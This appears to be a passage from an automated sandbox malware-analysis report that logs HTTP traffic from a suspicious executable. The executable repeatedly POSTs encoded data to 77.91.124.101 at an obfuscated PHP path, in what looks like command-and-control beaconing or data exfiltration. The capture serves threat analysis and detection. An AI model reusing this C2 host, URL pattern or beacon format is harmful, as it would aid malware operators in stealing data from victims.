                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:42.268085957 CET | 608 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:42.268487930 CET610OUTData Raw: 57 50 5d 5a 5b 5d 5f 5a 5d 57 55 57 55 5b 57 53 50 53 58 48 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WP]Z[]_Z]WUWU[WSPSXHV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\']=81Y?>=;7:=?%$-*S'"T-_?<;^,&G''^)3
                                                            Nov 21, 2023 04:48:42.472783089 CET | 611 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:42 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            114 | 77.91.124.101 | 80 | 192.168.2.5 | 49829 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:42.804671049 CET | 612 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:43.003443956 CET | 612 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:43.004524946 CET614OUTData Raw: 52 5c 5d 5d 5b 59 5a 5f 5d 57 55 57 55 5b 57 51 50 5a 58 42 56 56 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\]][YZ_]WUWU[WQPZXBVVWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'\>-<;"U)3,'2_ :( =$.>S&#>R.+*_?7,.&G''^)3
                                                            Nov 21, 2023 04:48:43.210524082 CET | 615 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:42 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            115 | 77.91.124.101 | 80 | 192.168.2.5 | 49830 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:43.542810917 CET | 616 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:43.744493961 CET | 616 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:43.744719028 CET618OUTData Raw: 52 5f 58 5e 5b 59 5a 5d 5d 57 55 57 55 5a 57 5a 50 58 58 48 56 52 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_X^[YZ]]WUWUZWZPXXHVRW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_*<+>S*#',B1"96+0*'-)$#&-;*<,/.&G''^)7
                                                            Nov 21, 2023 04:48:43.947633028 CET | 619 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:43 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            115192.168.2.54983077.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:43.542810917 CET616OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:43.744493961 CET | 616 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:43.744719028 CET | 618 | OUT | Data Raw: 52 5f 58 5e 5b 59 5a 5d 5d 57 55 57 55 5a 57 5a 50 58 58 48 56 52 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_X^[YZ]]WUWUZWZPXXHVRW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_*<+>S*#',B1"96+0*'-)$#&-;*<,/.&G''^)7
                                                            Nov 21, 2023 04:48:43.947633028 CET | 619 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:43 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            116 | 192.168.2.5 | 49831 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:44.269886017 CET | 620 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:44.469629049 CET | 620 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:44.470208883 CET | 622 | OUT | Data Raw: 52 5f 58 5b 5b 5e 5f 5e 5d 57 55 57 55 5a 57 55 50 5f 58 45 56 5e 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_X[[^_^]WUWUZWUP_XEV^W\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^==Y=;!>#3,4]4:=\+%3V$ 9,(*(+,&G''^)7
                                                            Nov 21, 2023 04:48:44.675368071 CET | 623 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:44 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            117 | 77.91.124.101 | 80 | 192.168.2.5 | 49832 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:45.006195068 CET | 623 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:45.203978062 CET | 624 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:45.355977058 CET | 625 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:45 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 0
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            118 | 192.168.2.5 | 49833 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:45.353457928 CET | 624 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:45.553359032 CET | 626 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:45.553590059 CET | 627 | OUT | Data Raw: 52 58 5d 59 5b 5d 5f 59 5d 57 55 57 55 5a 57 57 50 5a 58 43 56 53 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RX]Y[]_Y]WUWUZWWPZXCVSWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*+1^(;==3^;$97%]?U='-Q$ 1:]=??#_/>&G''^)7
                                                            Nov 21, 2023 04:48:45.755808115 CET | 630 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:45 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 22 5d 32 01 38 58 37 30 37 1d 2b 14 2e 0e 39 3e 3e 45 28 33 22 06 27 2e 3b 02 33 29 39 51 3d 2c 3f 00 33 3a 2c 57 20 36 3f 04 2b 20 21 5a 0c 1d 26 5c 36 3b 27 54 3f 58 3c 58 29 3e 23 02 32 0f 27 5e 3c 07 33 16 34 30 38 00 26 33 28 50 2e 3f 2d 5f 2f 3b 32 0b 31 02 2d 00 23 3d 23 5f 0c 14 24 0c 21 0f 2c 00 22 23 3a 12 23 27 16 14 37 37 37 1e 33 3d 0e 55 25 06 29 1a 3c 38 0a 53 32 34 27 0d 30 14 3c 0a 25 00 23 13 3c 3a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "]28X707+.9>>E(3"'.;3)9Q=,?3:,W 6?+ !Z&\6;'T?X<X)>#2'^<3408&3(P.?-_/;21-#=#_$!,"#:#'7773=U%)<8S24'0<%#<:&T*+H6ZP


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            119 | 192.168.2.5 | 49834 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:45.470352888 CET | 626 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:45.667021990 CET | 627 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:45.667335033 CET | 630 | OUT | Data Raw: 57 5c 58 5c 5b 5b 5a 5d 5d 57 55 57 55 57 57 50 50 5a 58 44 56 51 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\X\[[Z]]WUWUWWPPZXDVQW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*?:R*3;Z/'.[#?R'-' T9;>^(7\8&G''^)
                                                            Nov 21, 2023 04:48:45.868627071 CET | 631 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:45 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            12 | 77.91.124.101 | 80 | 192.168.2.5 | 49724 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:33.952024937 CET | 189 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:34.148653030 CET | 189 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:34.148940086 CET | 192 | OUT | Data Raw: 52 5b 5d 5a 5e 5d 5a 50 5d 57 55 57 55 5b 57 56 50 53 58 45 56 5e 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[]Z^]ZP]WUWU[WVPSXEV^W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_>)(2T=3#,7541)39$&W029(>+<;\->&G''^)3
                                                            Nov 21, 2023 04:47:34.355681896 CET | 192 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:34 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            120 | 192.168.2.5 | 49835 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:46.192867041 CET | 632 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:46.391906977 CET | 632 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:46.392203093 CET | 634 | OUT | Data Raw: 57 51 58 5a 5e 5a 5a 51 5d 57 55 57 55 57 57 52 50 5a 58 43 56 54 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WQXZ^ZZQ]WUWUWWRPZXCVTWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'>>?>>#[.'%4:+>3>:W33>T-;*_<<',&G''^)
                                                            Nov 21, 2023 04:48:46.595650911 CET | 635 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:46 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            121 | 192.168.2.5 | 49836 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:46.908144951 CET | 635 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:47.105767965 CET | 636 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:47.105983019 CET | 638 | OUT | Data Raw: 57 5f 58 5f 5b 5a 5f 5a 5d 57 55 57 55 5a 57 56 50 5f 58 49 56 50 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W_X_[Z_Z]WUWUZWVP_XIVPWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)2+]&S*3+\.$1#=_)#S$>W03:V:8&^(#];&G''^)7
                                                            Nov 21, 2023 04:48:47.308711052 CET | 638 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:46 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            122 | 77.91.124.101 | 80 | 192.168.2.5 | 49837 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:47.629125118 CET | 639 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:47.828713894 CET | 639 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:47.828972101 CET | 642 | OUT | Data Raw: 52 5b 5d 5a 5b 53 5a 5b 5d 57 55 57 55 5e 57 55 50 5a 58 47 56 50 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[]Z[SZ[]WUWU^WUPZXGVPWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=;*<> 7,B9#*6(0&Q'S-9<]/>&G''^)?
                                                            Nov 21, 2023 04:48:48.033458948 CET | 642 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:47 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            123 | 77.91.124.101 | 80 | 192.168.2.5 | 49838 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:48.348392010 CET | 643 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:48.545490980 CET | 643 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:48.545708895 CET | 646 | OUT | Data Raw: 52 5d 5d 5d 5b 53 5f 59 5d 57 55 57 55 5c 57 52 50 59 58 41 56 56 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]]][S_Y]WUWU\WRPYXAVVWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*^?;1>30/4&#)"<3-'.1$0!.->,<,&G''^)/
                                                            Nov 21, 2023 04:48:48.747749090 CET | 646 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:48 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            124 | 192.168.2.5 | 49839 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:49.065499067 CET | 647 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
